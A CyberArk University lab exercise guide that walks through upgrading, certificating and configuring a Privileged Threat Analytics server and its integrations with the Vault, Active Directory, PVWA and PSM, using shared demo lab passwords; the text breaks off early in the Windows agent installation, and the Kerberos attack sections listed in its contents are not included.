
CyberArk Privileged Threat Analytics

Install & Configure


CyberArk Privileged Threat Analytics – Install & Configure

CyberArk University

Privileged Threat Analytics Exercise Guide

Exercise Guide
CONTENTS

INTRODUCTION ..................................................................................................................................................... 6

USING SKYTAP...............................................................................................................................................................6
INTERNATIONAL USERS ...................................................................................................................................................8

CONFIGURING THE PRIMARY PTA SERVER ........................................................................................................... 12

UPGRADING TO VERSION 12.2 .......................................................................................................................................12


Copy the upgrade files to PTAServer1 ................................................................................................................13
Connect to PTAServer1 via PSM .........................................................................................................................14
GETTING A CERTIFICATE FOR THE PTA SERVER...................................................................................................................15
Generating a CSR................................................................................................................................................16
Signing the CSR...................................................................................................................................................18
Install certificates to the PTA Server ..................................................................................................................20
RUNNING THE PREPARATION WIZARD..............................................................................................................................22
Step 1/18 – End User License Agreement...........................................................................................................22
Step 2/18 – Change PTA root user password .....................................................................................................23
Step 3/18 – Network configuration ....................................................................................................................23
Step 4/18 – Domain names mapping configuration ..........................................................................................24
Step 5/18 – Date and time zone configuration ..................................................................................................24
Step 6/18 – Database initialization ....................................................................................................................24
Step 7/18 – Configuring internal components ...................................................................................................24
Step 8/18 – PAS connection configuration .........................................................................................................25
Step 9/18 – Loading user and safe activities report ...........................................................................................26
Step 10/18 – Baselines creation .........................................................................................................................26
Step 11/18 – Loading inventory report ..............................................................................................................27
Step 12/18 – Authorized source hosts configuration .........................................................................................27
Step 13/18 – Network sensor and PTA Agent connection configuration ...........................................................28
Step 14/18 – Golden Ticket detection configuration ..........................................................................................28
Step 15/18 – Email notifications configuration ..................................................................................................28
Step 16/18 – PTA maintenance user configuration ............................................................................................29

CyberArk University Exercise Guide Page 2

3/21/2022
© Cyber-Ark® Software Ltd - No part of this material may be disclosed to any person or firm or reproduced by any means, electronic and
mechanical, without the express prior written permission of Cyber-Ark® Software Ltd.

Step 17/18 – Deploying Web Application...........................................................................................................29


Step 18/18 – PTA initialization ...........................................................................................................................30
FIRST LOGIN TO THE PTA DASHBOARD.............................................................................................................................30

INTEGRATIONS .................................................................................................................................................... 34

VAULT INTEGRATION ....................................................................................................................................................34


ACTIVE DIRECTORY.......................................................................................................................................................35
PVWA ......................................................................................................................................................................37
PSM .........................................................................................................................................................................38
WINDOWS AGENT – EVENT FORWARDING .......................................................................................................... 41

INSTALLING THE WINDOWS AGENT .................................................................................................................................41


Running the PTA Agent Script Creator ...............................................................................................................41
Running the PTA Agent Installer ........................................................................................................................42
VERIFYING THE INSTALLATION .........................................................................................................................................42

TESTING THE INITIAL CONFIGURATION ................................................................................................................ 45

PREPARING THE ENVIRONMENT ......................................................................................................................................45


RootXX Users ......................................................................................................................................................45
Last CyberArk Login ............................................................................................................................................46
UNMANAGED PRIVILEGED ACCESS ..................................................................................................................................46
SUSPECTED CREDENTIAL THEFT AND AUTOMATIC PASSWORD ROTATION ................................................................................48
SUSPICIOUS PASSWORD CHANGE AND AUTOMATIC RECONCILIATION .....................................................................................51
SUSPICIOUS ACTIVITIES IN A WINDOWS SESSION AND AUTOMATIC SUSPENSION ........................................................................54
Create the Rule ...................................................................................................................................................54
Test the Rule .......................................................................................................................................................54
SUSPICIOUS ACTIVITIES IN AN SSH SESSION AND AUTOMATIC TERMINATION ............................................................................57
SECURITY RULES EXCEPTIONS .........................................................................................................................................58
AUTOMATIC ONBOARDING RULES ...................................................................................................................................60
Modify the target Safe permissions ...................................................................................................................60
Create a new rule ...............................................................................................................................................61
Test the rule .......................................................................................................................................................62

INSTALLING THE AGENT ON A DOMAIN CONTROLLER ......................................................................................... 63

INSTALLING THE PTA AGENT ..........................................................................................................................................63


Running the PTA Agent Script Creator ...............................................................................................................63
Running the PTA Agent Installer ........................................................................................................................64
VERIFYING ..................................................................................................................................................................65
RUNNING AGENTSHELL..............................................................................................................................................67

KERBEROS ATTACKS ............................................................................................................................................. 69

OVERPASS-THE-HASH ...................................................................................................................................................69


Allow the PTA to perform automatic password rotation ...................................................................................69


The attack begins ...............................................................................................................................................70
The victim connects ............................................................................................................................................71
The attack continues ..........................................................................................................................................71
The response ......................................................................................................................................................73
DCSYNC.....................................................................................................................................................................75
The attack ..........................................................................................................................................................75
The response ......................................................................................................................................................76
GOLDEN TICKET ...........................................................................................................................................................77
Configuring Golden Ticket attack detection .......................................................................................................77
The attack ..........................................................................................................................................................79
The response ......................................................................................................................................................80

ACTIVE DIRECTORY RISKS..................................................................................................................................... 81

EXPOSED CREDENTIALS .................................................................................................................................................81


UNCONSTRAINED DELEGATION .......................................................................................................................................83

MANAGING PTA ACCOUNTS WITH CYBERARK ..................................................................................................... 84

MANAGING THE PTA ADMINISTRATOR (WEB DASHBOARD) ................................................................................................84

TROUBLESHOOTING............................................................................................................................................. 86

SHORTCUTS UTILITY .....................................................................................................................................................86


CHANGING LOG LEVELS .................................................................................................................................................87
EXPORT TOOL (CYBERARK SUPPORT) ...............................................................................................................................88

PTA DR SERVER .................................................................................................................................................... 89

GETTING A CERTIFICATE ................................................................................................................................................89


Creating the CSR .................................................................................................................................................89
Signing the CSR...................................................................................................................................................90
Installing the Certificate and its Chain ...............................................................................................................91
9 STEPS .....................................................................................................................................................................92
PRIMARY SETUP ..........................................................................................................................................................93
CHECK THE CONFIGURATION ..........................................................................................................................................94
FAILOVER TO PTA DR SERVER ........................................................................................................................................95

OPTIONAL EXERCISES ........................................................................................................................................... 97

BRING PTASERVER1 BACK ON-LINE AS THE DR SERVER .......................................................................................................97


GOLDEN TICKET ATTACK USING MIMIKATZ .......................................................................................................................97

APPENDIX .......................................................................................................................................................... 101

SHORTCUTS.SH ..........................................................................................................................................................101


CyberArk Privileged Access Security – Administration

Introduction

Using Skytap

Before beginning exercises, here are a few tips to help you navigate the lab more
effectively.

1. Click the large monitor icon to connect with the HTML5 client

2. Use the Ctrl-Alt-Del button on the tool bar to send a Ctrl-Alt-Del to the machine

3. The clipboard icon will allow you to copy and paste text between your computer and
your lab machine. Do NOT copy parameters or settings from a PDF file into the
environment. It does not work.


4. The full screen icon will resize your lab machine to match your computer’s screen
settings to avoid scrolling

5. You may need to adjust your bandwidth setting on slower connections


International Users

By default, the lab machines are configured to use a US English keyboard layout. If you
use a machine from a country other than the US, you may experience odd behavior on
your lab machines. The solution is to install the layout for your keyboard on the lab
machines. Follow the process below to find and configure the correct keyboard layout.

1. From the Start Menu launch Add a language.

2. Click Add a language


3. Select your Language, thereafter click Open

4. Select your specific locality or dialect, thereafter click Add


5. If you use an alternate keyboard layout (e.g. AZERTY, Dvorak), click Options next to
your language to install it; otherwise, close the Language window

6. In the system tray, click ENG, then choose your keyboard layout

7. You may switch back and forth between keyboard layouts (Your instructor may need
to switch back to ENG to help you with exercises, occasionally)



Configuring the Primary PTA Server


In this first section, we will configure the primary PTA server in our environment. This
server was deployed as a virtual appliance from an image provided by CyberArk. Our
goal is to integrate this generic server into our corporate network.

Our first tasks are to:

• Upgrade the main PTA to version 12.2.3


• Get a signed certificate for our first PTA Server
• Perform the initial configuration of this device for our ACME.corp environment
using the one-time Preparation Wizard
• Connect the PTA to our existing CyberArk Privileged Access Manager
environment

We will be performing our work as the Active Directory user Mike (password Cyberark1).
We will log into the machine Components with this account and also use it to log into the
PVWA.

Our primary PTA server is PTAServer1, whose IP address is 10.0.0.2. We will connect to
it through PSM connections launched in the PVWA. In that way, all our actions on the
PTA will be recorded and auditable.

Ensure that all the VMs in Skytap – with the exception of PTAServer2 (we will start this
later) – are running before beginning the exercises.

Upgrading to version 12.2

As a first step, we will upgrade the PTA software on a CentOS Server. To do this, we will:

• Copy the upgrade files from the local drive on the Components server to the /tmp
directory on ptaserver1.
• Connect to ptaserver1 via the PSM.
• Modify the execution permissions on the upgrade script.
• Run the upgrade script.

Note: We have added the upgrade exercise here primarily to demonstrate how easy it is to
deploy a PTA.


Copy the upgrade files to PTAServer1

To perform this first step, we will connect to ptaserver1 with WINSCP via the PSM.

1. Log in to the server Components as Mike (password is Cyberark1). Launch the
Chrome browser (there is a shortcut in the task bar).

2. On the CyberArk home page, select LDAP as the authentication method.

3. When prompted, enter Mike and his LDAP password: Cyberark1

Note: You should be connected as the user Mike (password Cyberark1) to the server
Components. You should imagine that you are the Vault administrator and that
you are logged into your own workstation.

4. Find the account root for ptaserver1.acme.corp and open a connection using
WinSCP.


5. In the WinSCP window, on the left-hand side, browse to C:\PTA Course\PTA-Installer-Rls-v12.2.3.
This is a local folder on the Components server. On the right-hand side, browse to
/tmp. This is a temporary directory on the PTA server.

6. Select and drag the two files pta_installer.sh and pta-12.2.3.0.tgz from the left to the
right, copying them to the /tmp directory.

7. When you have finished, you can close the WinSCP window, but leave the PVWA
open.

Connect to PTAServer1 via PSM

As our next task, we will open a PSM connection to the PTAServer, and run the upgrade
script to bring the primary PTA up to the same version as our CyberArk PAM installation.

1. Go back to the account root for ptaserver1.acme.corp and open an SSH
connection.

2. Change directory to /tmp and run the command to enable execution:

cd /tmp/
chmod 700 pta_installer.sh

3. Next, execute the installation script.


./pta_installer.sh

4. You will be prompted to continue. Enter y and hit Enter.

5. It will take a moment to extract the files. You will then receive a message saying it is
best to perform a snapshot before executing an upgrade. We will skip the snapshot,
so enter lower-case y and hit Enter to proceed with the upgrade.

Welcome to Privileged Threat Analytics version 12.2.3 installation
tool.
CyberArk Privileged Threat Analytics may include certain third-party
components. Their licenses and acknowledgements are listed in the
About window in the CyberArk Privileged Threat Analytics dashboard.

Do you want to continue?[Y/N] y

The upgrade process will take a few minutes, enough time to go fetch a coffee or a tea.

At the end of the process you will be advised to restart the server. Type:

shutdown -r now

This reboots the server, which ends the remote session and closes PuTTY.

Getting a Certificate for the PTA Server

We want all communication with the PTA servers to be encrypted and authenticated, which
means we need a TLS server certificate from our PKI for each of our servers: ptaserver1, which
is our primary server, and ptaserver2, which is our disaster recovery server.

Additionally, there is a DNS alias, ptaserver, that resolves to either 10.0.0.2 or 10.0.0.3,
whichever is the active PTA at the time. Our clients (other servers and end users) will be given
the alias ptaserver.acme.corp as the target address, so each PTA server must be able to
identify itself both by its own name and by the alias. To achieve this, we will put the additional
names in the certificate's Subject Alternative Name (SAN) extension; a client that is given the
alias will reject a certificate that names only the individual host.

The CyberArk PTA has a built-in mechanism for generating certificate requests. We will:

• Generate a certificate signing request (CSR) for our first PTA server
• Submit that request to the Cyber-Ark-Demo Certification Authority for
signature
• Import the signed certificate into the ptaserver1 machine


Generating a CSR

In this section, we will use a PTA utility to generate a certificate signing request, or
CSR.

1. On the Components server, log into the PVWA as Mike and open another SSH
connection with account root to ptaserver1.acme.corp.

2. Launch the PTA utility tool:

/opt/tomcat/utility/run.sh

Note: You can jump to the utility's directory with the PTA shortcut UTILITYDIR.

3. Enter 14 as your menu option: Generating a Certificate Signing Request (CSR).
This will launch a wizard that will guide us through the CSR creation process.

4. Enter the PTA Host Name, the short name of the DNS alias: ptaserver (as shown in the
transcript below; the full alias ptaserver.acme.corp is entered as the shared FQDN in step 10)

5. Enter the Organization name: ACME

6. Enter the department name: Training

7. Enter the City name: Boston

8. Enter the State: MA

9. Enter the Country code: US

10. PTA Server shared FQDN: ptaserver.acme.corp

11. Enter the Subject Alternative Names as shown below:

dns:ptaserver1.acme.corp,ip:10.0.0.2

The whole exchange should look like the transcript below.

Your action: 14

Action in progress...

[Step 1/1 - CertificateSigningRequestGenerationUtil]

Installation of the certificate will restart the PTA application.


Generating a Certificate Signing Request (CSR) - Please specify the
certificate details:
PTA Host Name: ptaserver
Organization: ACME
Department: Training
City: Boston
State: MA
Country Code: US
PTA Server shared FQDN (for Disaster Recovery mode, optional):
ptaserver.acme.corp
Subject Alternative Names (Example: dns:<DNS_NAME>,ip:<IP_ADDRESS>):
dns:ptaserver1.acme.corp,ip:10.0.0.2
Certificate Signing Request (CSR) created successfully.

-----BEGIN NEW CERTIFICATE REQUEST-----
...
-----END NEW CERTIFICATE REQUEST-----

Contact your security representative to create a Certificate Chain
(Root, Intermediate(s), PTA Server certificates)

Action completed

Exiting utility.
[root@PTAServer utility]#

Copy the CSR from the PuTTY window to Notepad: everything from the
-----BEGIN NEW CERTIFICATE REQUEST----- line to the -----END NEW CERTIFICATE REQUEST-----
line, inclusive. You can do this by selecting the text in the PuTTY window, hitting Enter, and
then pasting the text into Notepad.

Leave the PuTTY session open.


Note: If you prefer, you can use WinSCP to get the generated CSR file from the PTA
server. Use the root account on 10.0.0.2 in the PVWA. The file is located at
/opt/tomcat/ca/ptaserver.csr.

Signing the CSR

In this section, we will submit the CSR for signature to the Microsoft Active Directory
Certificate Services for ACME.corp.

1. Launch Internet Explorer (there is a shortcut in the task bar). You should
automatically arrive at the following site:

https://dc01.acme.corp/certsrv

2. Click Request a certificate.

3. Click advanced certificate request and then Submit a certificate request by
using a base-64…

4. Copy all the contents of the CSR and paste it into the relevant box as shown below
and select ACME Server from the Certificate Template drop down menu.


5. Click Submit. You will be asked to confirm the creation of a certificate. Click Yes.

6. In the next screen, select Download certificate, making sure DER encoded is
selected.


7. Save the file as pta.cer to c:\CYBR_Files, replacing the file that is there.

Note: You should now have two certificate files in your CYBR_Files folder: pta.cer and
acme.cer. The latter file is the certificate for the Root Authority and the two files
together represent the entire authority chain.

Install certificates to the PTA Server

In this section, we will upload our new certificate (pta.cer) and the certification authority
Root CA certificate (acme.cer) to the PTA server, and then run a script to associate these
certificates with our PTA server.

Warning: This process is not tolerant of mistakes. As you proceed, enter the information
carefully and then double-check that you have entered the correct information
before hitting the Enter key. If you make an error, you will have to start again from
the beginning and generate a new CSR. You have been warned.

1. Open another connection to the ptaserver1, this time using WinSCP as root to
ptaserver1.acme.corp (via the PSM, of course) and copy both certificate files –
pta.cer and acme.cer – from C:\CYBR_Files\ to the PTA server, placing them in the
/tmp/ folder.


Note: Make sure you place them in /tmp and not a sub-directory by accident.

2. You can close the WinSCP connection and switch back to the SSH connection,
which should still be open. We are going to run the same script again from the
UTILITYDIR folder:

./run.sh

3. This time choose option 15. Installing SSL Certificate Chain. Here, we will:

• Provide the path to the ptaserver server certificate: /tmp/pta.cer
• Say ‘yes’ to the Root certificate
• Provide the path to the root certificate: /tmp/acme.cer
• Say ‘no’ to the intermediate certificate

Your action: 15

Action in progress...

[Step 1/1 - SSLCertificateInstallationUtil]

This step requires Vault Admin credentials using CyberArk
authentication, and a restart of PTA services.

Installing SSL Certificate Chain (Root, Intermediate(s), PTA Server
certificates):
Specify PTA Server Certificate full path: /tmp/pta.cer
Do you have a Root Certificate (y/n)?: y
Specify your Root Certificate full path (for example:
/tmp/RootCertificate.crt): /tmp/acme.cer
Do you have Intermediate certificate(s) (y/n)?: n

SSL Certificate Chain installed successfully.

Restarting PTA services...

Action completed

Exiting utility.
[root@PTAServer utility]#

Note: Although it states that this step requires Vault Admin credentials, it does not prompt
for authentication. You can ignore this.

Running the Preparation Wizard

The Preparation Wizard, or PrepWiz, is a script that you run on the PTA server to
integrate it with your corporate environment. There are 18 steps in the process and we will
walk through them in this section.

If you are still not connected to PTAServer1, launch a PuTTY session from Components via
the PSM, using the root account on ptaserver1.acme.corp.

1. Run the following CyberArk PTA shortcut command to jump to the PrepWiz folder:

PREPWIZDIR

2. You are now in /opt/tomcat/prepwiz. Run the PrepWiz script:

./run.sh

Step 1/18 – End User License Agreement

First you need to accept the terms of CyberArk’s End User License Agreement. Type y
and then press Enter to accept the EULA (End User License Agreement).

[Step 1/18 - End User License Agreement]

Please read CyberArk's Privileged Threat Analytics End User License
Agreement, which determines the terms of use of this software and all
of its components.
CyberArk's Privileged Threat Analytics may include certain third party
components, which are listed in the About window in the Privileged
Threat Analytics dashboard.

To install CyberArk's Privileged Threat Analytics, you must accept the
End User License Agreement which you can view at
/opt/pta/utility/EULA.
Do you accept all terms of this agreement (y/n)? y
End User License Agreement accepted successfully.

Step 2/18 – Change PTA root user password

Nothing to do here. We can move on to the next step.

[Step 2/18 - Change PTA root user password]

The root password is not the default password, no password change is
required.

Step 3/18 – Network configuration

In this step, the Wizard detects our PTA server’s current IP address (10.0.0.2); type n
and hit Enter to keep this value. The Wizard then detects our current DNS server. We
have only one DNS server (10.0.0.1), so there is no need to add any additional DNS
servers: enter n and hit Enter.

[Step 3/18 - Network configuration]

Found existing IP address: 10.0.0.2
Would you like to change the IP Address (y/n)?: n
IP configuration finished successfully

DNS configuration
Found existing DNS server: 10.0.0.1
Testing configuration... ping - to perform verification of DNS
Configuration test was completed successfully
Would you like to specify an additional DNS server (y/n)? [n]: n

Make sure the configuration test completes successfully.


Step 4/18 – Domain names mapping configuration

Press n and then Enter, as we will not need cross-domain configuration.

[Step 4/18 - Domain names mapping configuration]

PTA requires a list of each domain name with its corresponding NETBIOS
(pre-Windows 2000) name to better identify each domain name in the
data.
You must perform this step for each domain in each Active Directory
that is monitored by PTA. For more information specify 'help'.
Would you like to specify domain names mapping configuration (y/n)?: n

Step 5/18 – Date and time zone configuration

We will use the time zone for London – right/Europe/London – which is the zone set for
our virtual machines. We will also enter the date and time manually (use the time on your
Windows server) and we will say no to synchronizing with an NTP server.

[Step 5/18 - Date and time zone configuration]

Specify your time zone (example: America/Chicago). For a full time
zone list, specify 'help'.
Time zone: right/Europe/London

Specify current date and time in 24h format "MM/DD/YYYY hh:mm"
(example: 11/21/2013 16:20): 03/09/2022 10:05

Do you want to synchronize with an NTP server (y/n)? [n]: n

Date and time zone configuration finished successfully.

Step 6/18 – Database initialization

There is nothing to do in this step.

[Step 6/18 - Database initialization]

Database is already running.
Database initialization finished successfully.

Step 7/18 – Configuring internal components

There is nothing to do in this step.

[Step 7/18 - Configuring internal components]

Configuring internal components finish successfully.

Step 8/18 – PAS connection configuration

This is an optional step that we will perform. There are a number of sub-steps, so we will
break it down.

First, we say ‘yes’ (y) to the optional step and then configure the connection to the
Vault: provide the IP address 10.0.10.1, accept the default port, and enter n to decline
configuring a DR Vault.

Then we provide the user name and password of a CyberArk user with the rights to create
safes and users (we will use the built-in Administrator account and the password
Cyberark1).

Next, we confirm our time zone.

Note: In the section below, we have inserted xxxxxxxxx to show where you need to enter
the password, however these x’s will not actually appear.

[Step 8/18 - PAS connection configuration]

This step is optional. Would you like to configure it (y/n)? [y]: y

Establish connectivity between PTA and the Vault to authorize the
Vault as a source host. This is a prerequisite for:
Forwarding data from the Vault
Retrieving Vault reports
Configuring Golden Ticket detection
Specify the Vault server's IP address and port number.
IP: 10.0.10.1
Port: [1858]
Would you like to configure Vault DR (y/n)? n
Specify Vault Admin credentials using CyberArk authentication.
This user must have administrator permissions, and it will be used to
update the environment required for the PTA in the Vault server.
Vault Admin username [Administrator]:
Vault Admin password:xxxxxxxxx
Retype Vault Admin password:xxxxxxxxx
Creating PTA Vault user.
PTA Vault user created successfully.
Creating PTAApp Vault user.
PTAApp Vault user created successfully.
Specify your vault time zone (example: America/Chicago). For a full
time zone list, specify 'help'.
Time zone [right/Europe/London]:
Is your vault installed in a cluster or distributed environment?
(y/n)? n
Vault configuration finished successfully.
Establish connectivity between PTA and the PVWA. Would you like to
configure this (y/n)? [y]:
By default, the PTA connection with PVWA is verified and trusted,
using a pre-configured PVWA certificate chain installed in PTA.
Note: If you have not installed the PVWA certificate chain in PTA,
click ctrl+C to exit the PTA installation wizard, run
/opt/tomcat/utility/sslClientCertificateChainInstallationUtil.sh to
install the certificate chain in PTA, and run the PTA installation
wizard again.
Would you like to keep the trusted connection between PTA and PVWA
(y/n)? [y]:
Enter PVWA address (example: pvwa.domain.com): pvwa.acme.corp
Https enabled (y/n)? [y]:
PVWA port [443]:
PVWA application root context [PasswordVault]:
Testing PVWA connection...
Connection completed successfully

Step 9/18 – Loading user and safe activities report

Here we will say yes to loading the user and safe activities from the Vault to the PTA
database and confirm the number of days (180) of activities. This step provides the PTA
with the activity history of the Vault prior to the installation of the PTA. If you were to say
‘no’ to this option, the PTA would be starting off with a blank slate, as it were.

[Step 9/18 - Loading user and safe activities report]

This step is optional. Would you like to configure it (y/n)? [y]:

Specify the number of previous days that will be included in the user
and safe activities report.
Number of days [180]: 180
Generating the user and safe activities report...
Loading the user and safe activities report...
User and safe activities report loading was completed successfully.

Step 10/18 – Baselines creation

In this step we confirm the creation of a behavior profile for what is considered “normal”.

[Step 10/18 - Baselines creation]

This step is optional. Would you like to configure it (y/n)? [y]:

Creating baseline for 'Privileged access during irregular hours'
algorithm...
Baseline created successfully

Creating baseline for 'Excessive access to privileged accounts'
algorithm...
Baseline created successfully

Creating baseline for 'Accessing the Vault from irregular IP'
algorithm...
Baseline created successfully

Baselines creation finished successfully.

Step 11/18 – Loading inventory report

Here we confirm the loading of the inventory report.

[Step 11/18 - Loading inventory report]

This step is optional. Would you like to configure it (y/n)? [y]:

Generating the inventory report...
Loading the inventory report...
Inventory report loading was completed successfully.

Step 12/18 – Authorized source hosts configuration

This step configures which IP addresses are authorized to forward information to the PTA.
We will accept messages from all addresses (although this is NOT the recommendation), so
enter All and hit Enter.

[Step 12/18 - Authorized source hosts configuration]

Specify the source host IPs that are authorized to forward messages to
PTA, separated by a comma (for example: 11.22.33.44,11.22.33.55).
To allow all hosts types to forward messages to PTA, specify 'All'.
To prevent any host type from forwarding messages to PTA, specify
'None'.

PTA should only be permitted to receive messages from authorized
sources such as organizational SIEM solutions and any other server
that sends messages directly to PTA.
If the Vault connection was configured, the Vault is automatically
considered to be an authorized source host (no need to specify it in
this step).

Authorized machines: All

Authorized source hosts configuration finished successfully.


Step 13/18 – Network sensor and PTA Agent connection configuration

We will say yes to perform this optional step. We will say yes to the use of PTA agents.
We will say no to the installation of a network sensor machine.

[Step 13/18 - Network sensor and PTA Agent connection configuration]

This step is optional. Would you like to configure it (y/n)?: y

The PTA Server can be configured to collect network traffic with
agents installed on your DC's or with Network Sensor machines or with
both.
Will your implementation include PTA agents? (y/n): y
The Server configuration for PTA agents was configured successfully.
After completing the PTA Server installation, you must install the PTA
agents.
Will your implementation include PTA network Sensor machines? (y/n): n

Step 14/18 – Golden Ticket detection configuration

Here we will skip Golden Ticket configuration. We will configure it manually later.

[Step 14/18 - Golden Ticket detection configuration]

This step is optional. Would you like to configure it (y/n)?: n

Golden Ticket detection configuration skipped.

Step 15/18 – Email notifications configuration

We will perform this optional step. We will skip encrypting the connection and then we will
enter the IP address of our mail server (10.0.0.1), confirm the default port (25), enter a
no-reply email address for the sender (CyberArk_PTA@cyber-ark-demo.local) and the
group address for the receiver of notifications (cyberarkvaultadmins@cyber-ark-demo.local),
and say no to mail server authentication. Finally, we will say ‘yes’ to a test email. You
will find a shortcut to the email server in your browser. Connect with the account Mike
with the password Cyberark1 and you should receive a test mail (see the image below).

[Step 15/18 - Email notifications configuration]

This step is optional. Would you like to configure it (y/n)? [y]:

We recommend that you configure email integration in a secure method,
which requires the exchange certificate to be installed in PTA prior
to running this step.
Email encryption method (starttls/ssl/none)? [starttls]: none
Specify the email server address: 10.0.0.1
Specify SMTP port [25]:
Specify the sender's email address (in the following format:
user@domain.com): CyberArk_PTA@acme.corp
Specify the recipient's email address (in the following format:
user@domain.com). Separate multiple addresses with ';' (semi-colon):
cyberarkvaultadmins@acme.corp
Does the mail server require authentication (y/n)? [y]: n
Verifying email configuration...
Email configuration verification completed successfully. Test email
sent to configured attendees.
Was the test email received (y/n)? [y]:
Email notifications configuration finished successfully.

Step 16/18 – PTA maintenance user configuration

In this step we will create a password for the PTA maintenance user ptauser. We will use
Cyberark1.

[Step 16/18 - PTA maintenance user configuration]

Creating a user for system maintenance.
Specify a password for this user:xxxxxxxxx
Retype password:xxxxxxxxx
PTA maintenance user was created successfully.

Step 17/18 – Deploying Web Application

Nothing to do here. This step launches automatically after the previous step.


[Step 17/18 - Deploying Web Application]

Deploying the Web application finished successfully.

Step 18/18 – PTA initialization

Finally, we will choose yes to initialize the PTA.

[Step 18/18 - PTA initialization]

This step is optional. Would you like to configure it (y/n)?[y]: y

Starting PTA

PTA services will automatically restart. This will take a couple of minutes at the end of
which you should see the following message:

PTA initialization finished successfully.

This step may take a moment, so be patient.

When everything is finished, restart the PTA server using:

shutdown -r now

First Login to the PTA Dashboard

In this section, we are going to log in to the PTA web dashboard, perform a required
password change, and upload the license file.

1. Connect to ptaserver1.acme.corp as root and go to /opt/tomcat/utility.

Tip: You can use the CyberArk PTA shortcut command UTILITYDIR and go directly to
this location.

2. Run the command to reset the default Administrator password for the web console.

./resetPtaAdminPass.sh

3. You will be prompted to continue resetting the Administrator’s password, type y and
then Enter.

4. Type in Cyberark1 as the password and hit Enter, then retype Cyberark1 to confirm
the password and hit Enter again.


5. Open a browser and navigate to the PTA dashboard – https://ptaserver.acme.corp
(in Chrome, click on the PTA bookmark). The first connection might take a minute.
You can refresh if it takes too long.

6. Because the password was just reset, you must set a new password at first login.
Enter the following credentials:

• Username: administrator
• Password: Cyberark1

7. You will now need to set a new password. Use the following as the new password:
CyberArk1234. You will need to enter the password twice.


8. In the next window you will need to upload the PTA License. Use the Browse button,
navigate to C:\PTA Course, and select the file shown below to upload:
PTA_NFR_CyberArkTraining_Until_2022-21-31.xml.


9. If the page doesn’t refresh automatically, click the refresh button and you should
have access to the PTA dashboard as shown below:


Integrations

In this section, we will configure the connections between the PTA and the following
components:

• Vault
• Active Directory
• PVWA
• PSM

Vault Integration

In this section, we are going to integrate the PTA with the Vault by adding a syslog section
to the file dbparm.ini and updating the Vault’s PTA.xsl file to version 12.2.3.

Two files for this purpose have been prepared for the training and are already in a Safe
named xfer in the Vault, so we will connect to the Vault server and download these two
files.

Note: The first time you log into the Vault Windows server after a restart, you will have to
allow a script to run via UAC.

1. In Skytap, go to the Vault server and log on as Administrator with password
Cyberark1.

2. Log in to the PrivateArk Client as Administrator. There is a Safe named xfer. Open
the Safe and download the files Syslog_PTA_dbparm.txt and PTA.xsl. Place them
on the desktop or wherever is convenient. You can close the PrivateArk Client.

3. In Windows Explorer, navigate to the Vault configuration folder:
C:\Program Files (x86)\PrivateArk\Server\Conf.

4. Open the dbparm.ini file using Notepad and replace the existing [SYSLOG] section
at the bottom of the file with the contents of the file Syslog_PTA_dbparm.txt:

[SYSLOG]
SyslogTranslatorFile=Syslog\PTA.xsl
SyslogServerPort=514
SyslogServerIP=10.0.0.2,10.0.0.3
SyslogServerProtocol=UDP
SyslogMessageCodeFilter=7,24,31,294,295,300,302,308,359,361,372,373,411,412,427,428,436,471,4624,4720,4723,4724,4732
UseLegacySyslogFormat=No


5. Next, browse to the C:\Program Files (x86)\PrivateArk\Server\Syslog directory.
Delete the PTA.XSL file you find there and replace it with the one you downloaded
from the Vault.

6. Restart the PrivateArk Server service using Windows Services for the
configuration to take effect (say “Yes” to also restarting the Cyber-Ark Event
Notification Engine). Check ITALOG.log for errors before proceeding.

7. Once you have done this, you can log off the Vault server and return to
Components.

8. Log in to the PTA Dashboard and you should now see Vault data coming through.

Active Directory

In this section, we will configure the PTA to connect to your organization’s Active Directory
server using LDAP/S.

1. Open a browser and connect to the PTA Dashboard from Components as
Administrator with the password CyberArk1234.

2. Go to the SETTINGS tab and click the AD Connectivity link in the left-hand pane.

3. In the Global Catalog server address field, enter the FQDN of the Active Directory
server: dc01.acme.corp.

4. Select Yes for the LDAP over SSL option. The value for the Global Catalog port
will change automatically to 3269.


5. For the SSL certificate field, click the Browse button, go to the C:\CYBR_Files
directory and select the domain controller certificate acme.cer. Note that the path to
the file will appear as: C:\fakepath\acme.cer. This is normal.

6. In the User Principal Name field, enter the name of the user account that will be
used to enable the PTA Server to scan the AD Server (the bind account):
bindaccount@acme.corp

7. Enter the password for the user: Cyberark1

8. In the LDAP PTA group field type in CyberArk Vault Admins

9. In the Group domain field type in acme.corp

10. Click Save and ensure that the connection is successful.

11. Click on DASHBOARD in the top bar and you should see that the PTA is now
connected to Active Directory and that it has already detected a risk in our Active
Directory configuration. This change may take a moment to appear.


12. While still in the PTA Dashboard, go to the Settings tab and click the PAS
Connectivity link in the left pane.

13. Confirm the PVWA CONNECTION DETAILS are as follows:

PVWA

We configured the connection to CyberArk PAM during the 18-step Preparation Wizard
executed earlier. Here, we are going to review our configuration and then activate some
additional PTA functionality through the PVWA.

To begin, let’s make sure that the PVWA has updated its configuration based on the
recent changes by restarting the IIS server, which you can do by opening a command line
with Run as administrator, typing iisreset, and hitting Enter.


1. Now open a connection to the PVWA and log in as Mike.

2. Browse to Security -> Security Configurations and enable all the options, as
shown below.

PSM

Now we are going to configure the Privileged Session Manager to exchange information
with the PTA.

1. In the PVWA and connected as Mike, browse to Administration > Configuration
Options > Options > Privileged Session Management UI and set the parameter
PSMandPTAIntegration to Yes. Click Apply to save your change.


2. Go to Options > Privileged Session Management > General Settings > Server
Settings > Live Sessions Monitoring Settings. Set AllowPSMNotifications to
Yes and click Apply. Verify that the parameter MonitoringLevel is set to Control.
This allows members of the group PSMLiveSessionTerminators to terminate PSM
sessions. CyberArk Vault Admins have already been added to this group.

3. Next, verify that the group PSMLiveSessionTerminators is set for the two
parameters Terminating Live Sessions Users and Groups and Suspending Live
Sessions Users and Groups under Live Sessions Monitoring Settings.

4. Click on Apply to save your settings.

5. Next navigate to Options > Access Restriction, right-click on Access Restriction
and select Add AllowedReferrer.

6. In the BaseUrl parameter, enter ptaserver.acme.corp, set RegularExpression
to Yes, and click OK to save all the changes and close the Options.


Windows Agent – Event Forwarding

Now we will install the PTA Agent software on the Target Windows machine:
target-win.acme.corp. This will involve running a wizard that will build the installation
script for the PTA Agent. The software files have already been copied to the destination
machine for convenience.

Installing the Windows Agent

We will perform this action using an RDP connection on the PSM. In that way, our actions
will be recorded and can be monitored.

This process is divided into two tasks:

• Running the PTA Agent Script Creator
• Running the PTA Agent Installer

Running the PTA Agent Script Creator

This task builds a script that is then used to install the PTA Agent on a Windows server
with the appropriate parameters.

1. Log in to the PVWA using the Mike user.

2. Find the domain account administrator and select the machine target-win.acme.corp.
Click Connect to open an RDP connection via the PSM to the target server.
